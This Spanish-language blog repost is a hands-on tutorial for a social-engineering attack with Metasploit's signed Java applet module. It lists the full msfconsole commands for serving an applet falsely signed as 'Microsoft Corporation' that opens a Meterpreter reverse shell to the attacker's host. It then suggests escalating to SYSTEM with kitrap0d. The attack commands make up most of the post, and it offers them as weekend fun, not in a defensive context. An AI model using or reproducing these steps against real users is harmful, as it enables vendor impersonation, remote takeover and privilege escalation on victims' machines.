Banner 1

Ingeniería Social con Applets firmados de Java en MetaSploit

Una traduccion del episodio 185 muy buena realizada por kunfoosion, sin mas detalles les dejo la entrada.
--------------------------------------------------------------------------------------

En el episodio 185 de PaulDotCom, Carlos Perez explicó como utilizar un nuevo módulo para MetaSploit escrito por Natron, que nos permite crear applets firmados de Java con un payload malicioso.

Lo estuve probando y funciona muy bien, lo único a tener en cuenta es que la víctima debe tener instalado JRE previamente, luego es solo un ataque de ingeniería social, ya que no estamos explotando ninguna vulnerabilidad en un software.

Esta todo muy bien explicado en las notas técnicas del webcast, pero les dejo un resumen de los comandos a continuación:

Antes de llegar a MetaSploit, primero debemos instalar algunas librerías en BackTrack:

# Instalamos Sun Java JDK
apt-get install sun-java6-jdk

# Configuramos Sun Java JDK
echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME

# Instalamos la rjb gem
gem install rjb


Luego actualizamos MetaSploit ya que el módulo es muy reciente:

cd /pentest/exploits/framework3
svn update


Lo que vamos a hacer a continuación, es levantar un servidor Web malicioso, que cuando a alguien se conecte a la URL "http://IP_Atacante/kungfoosion", le entregue un applet de java firmado por quien nosotros queramos, y si el usuario decide aceptarlo, ese código se ejecutará en su sistema y vamos a obtener una shell de meterpreter.

El servidor Web lo levantamos en el puerto 80, con "SRVPORT", y escuchamos la conexión reversa de la víctima en el puerto 443, con "LPORT". Con la opción "CERTCN", indicamos por quien va a estar firmado el applet:

./msfconsole
use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.168.0.157
set LPORT 443
set TARGET 1
set URIPATH kungfoosion
set SRVPORT 80
set CERCN Microsoft Corporation
exploit


Una vez que el usuario ingresa a "http://10.168.0.157/kungfoosion", si no posee JRE instalado, le aparecerá la siguiente advertencia en Firefox, preguntándole si lo desea instalar:


Si ya tiene JRE instalado, simplemente le preguntara a la Víctima si confia en el applet de ese website:


Una vez que estamos en meterpreter, podemos utilizar todos los comandos que este nos provee, si usamos "getuid" vamos a ver que estamos corriendo con los privilegios de "Administrador". Ahora, si nos ponemos golosos, también podríamos escalar privilegios a SYSTEM ejecutando "run kitrap0d", el reciente exploit local para Windows de 17 años de antigüedad:


Eso es todo, muy divertido para una tarde de Sábado :)


FUENTE:
http://kungfoosion.blogspot.com/2010/01/ingenieria-social-con-applets-firmados.html
- PaulDotCom Episode 185

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay